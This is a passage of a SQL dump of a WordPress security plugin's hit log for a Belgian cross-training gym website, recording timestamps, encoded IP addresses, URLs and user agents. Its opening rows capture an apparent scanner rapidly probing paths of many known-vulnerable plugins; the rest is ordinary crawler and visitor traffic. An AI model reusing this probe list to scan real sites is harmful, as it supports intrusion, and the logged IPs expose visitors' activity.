(77424, 1500132375.231285, 1742919172, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/fcchat/default.png', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; de-DE) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/10.0.649.0 Safari/534.17'),
(77425, 1500132375.232665, 1742919169, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wpmarketplace/readme.txt', '', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20'),
(77426, 1500132376.122939, 1742919172, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/user-meta/readme.txt', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.12 Safari/534.24'),
(77427, 1500132376.551700, 1742919169, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-property/action_hooks.php', '', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3'),
(77428, 1500132376.923855, 1742919172, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/user-avatar/readme.txt', '', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3'),
(77429, 1500132377.044178, 1742919169, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-editor/readme.txt', '', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30'),
(77430, 1500132377.277857, 1742919169, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/cimy-user-extra-fields/README_OFFICIAL.txt', '', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16'),
(77431, 1500132377.282445, 1742919172, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/resume-submissions-job-postings/installer.php', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.813.0 Safari/535.1'),
(77432, 1500132377.284577, 1742919172, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/ckeditor-for-wordpress/ckeditor.config.js', '', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16'),
(77433, 1500132379.269676, 1742919172, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/category-grid-view-gallery/cat_grid.php', '', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.6 (KHTML, like Gecko) Chrome/16.0.897.0 Safari/535.6'),
(77434, 1500132381.407309, 1742919172, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1'),
(77435, 1500132382.047506, 1742919169, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/nmedia-user-file-uploader/readme.txt', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.107 Safari/535.1'),
(77436, 1500132384.169593, 1742919172, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/nextgen-gallery/changelog.txt', '', 'Mozilla/5.0 (X11; CrOS i686 12.433.109) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.93 Safari/534.30'),
(77437, 1500132384.610040, 1742919169, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/mac-dock-gallery/bugslist.txt', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/12.0.702.0 Safari/534.24'),
(77438, 1500132384.610764, 1742919169, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/font-uploader/font-uploader-free.php', '', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.809.0 Safari/535.1'),
(77439, 1500132386.444777, 1742919172, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/gallery-plugin/gallery-plugin.php', '', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16'),
(77440, 1500132386.726088, 1742919169, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/front-end-upload/destination.php', '', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30'),
(77441, 1500132386.817180, 1742919169, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/simple-dropbox-upload-form/', '', 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1'),
(77442, 1500132387.322519, 1742919172, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/custom-content-type-manager/index.html', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3'),
(77443, 1500132387.890860, 1742919169, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wpmarketplace/readme.txt', '', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11'),
(77444, 1500133992.457753, 1742919172, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/front-end-upload/destination.php', '', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11'),
(77445, 1500135301.947701, 1742919169, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/user-photo/admin.css', '', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30'),
(77446, 1500137497.721433, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77447, 1500141472.782129, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(77448, 1500141473.234207, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77449, 1500141473.629356, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77450, 1500141474.174248, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77451, 1500141474.617095, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77452, 1500141475.004887, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77453, 1500141475.429254, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77454, 1500141475.854646, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(77455, 1500141476.251935, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77456, 1500141476.664564, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77457, 1500141477.072376, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77458, 1500141477.547467, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77459, 1500141477.967942, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77460, 1500141478.392280, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77461, 1500141792.653813, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77462, 1500143818.911298, 3512711551, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', '=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16'),
(77463, 1500143929.598735, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(77464, 1500143930.058975, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77465, 1500143930.472962, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77466, 1500143930.946919, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77467, 1500143931.416510, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77468, 1500143931.873426, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77469, 1500143932.302236, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77470, 1500143932.745861, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(77471, 1500143933.213198, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77472, 1500143933.717805, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77473, 1500143934.122266, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77474, 1500143934.600501, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77475, 1500143935.009343, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77476, 1500143935.405508, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77477, 1500146844.016289, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(77478, 1500146844.506213, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77479, 1500146844.908854, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77480, 1500146845.373779, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77481, 1500146845.831279, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77482, 1500146846.431934, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77483, 1500146846.864511, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77484, 1500146847.454619, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(77485, 1500146848.216765, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77486, 1500146848.999717, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77487, 1500146849.403256, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77488, 1500146849.895706, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77489, 1500146850.581227, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77490, 1500146851.036273, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(77491, 1500147279.986612, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(77492, 1500147280.663133, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77493, 1500147281.598759, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77494, 1500147282.946401, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77495, 1500147283.450816, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77496, 1500147284.083916, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77497, 1500147284.488747, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77498, 1500147285.112635, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(77499, 1500147285.529168, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77500, 1500147285.984901, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77501, 1500147286.488448, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77502, 1500147287.149917, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77503, 1500147287.548995, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77504, 1500147287.945715, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77505, 1500148097.459065, 3582305802, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Jooblebot/2.0; +http://jooble.org/jooble-bot)'),
(77506, 1500148996.738328, 2745986569, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77507, 1500149005.117189, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77508, 1500149014.426093, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77509, 1500149021.851158, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/feed/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77510, 1500149022.228052, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/feed/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77511, 1500149022.601409, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77512, 1500149029.721429, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77513, 1500149036.399647, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77514, 1500149042.581732, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77515, 1500151559.425346, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77516, 1500152691.883179, 3582305802, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Jooblebot/2.0; Windows NT 6.1; WOW64; +http://jooble.org/jooble-bot) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36'),
(77517, 1500152692.496648, 3582305802, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; Jooblebot/2.0; Windows NT 6.1; WOW64; +http://jooble.org/jooble-bot) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36'),
(77518, 1500156328.225093, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(77519, 1500156328.707674, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77520, 1500156329.135244, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77521, 1500156329.533931, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77522, 1500156330.000812, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77523, 1500156330.371269, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77524, 1500156330.754265, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77525, 1500156331.217378, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(77526, 1500156331.707814, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77527, 1500156332.096524, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77528, 1500156332.494687, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77529, 1500156332.932274, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77530, 1500156333.327787, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77531, 1500156333.743661, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77532, 1500157018.611217, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77533, 1500160989.889658, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77534, 1500162164.632277, 3582305802, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Jooblebot/2.0; +http://jooble.org/jooble-bot)'),
(77535, 1500163340.177530, 3475901892, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77536, 1500163431.537554, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77537, 1500176790.464959, 3003111232, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)'),
(77538, 1500176790.871486, 3003111232, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)'),
(77539, 1500183535.128524, 3301852133, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
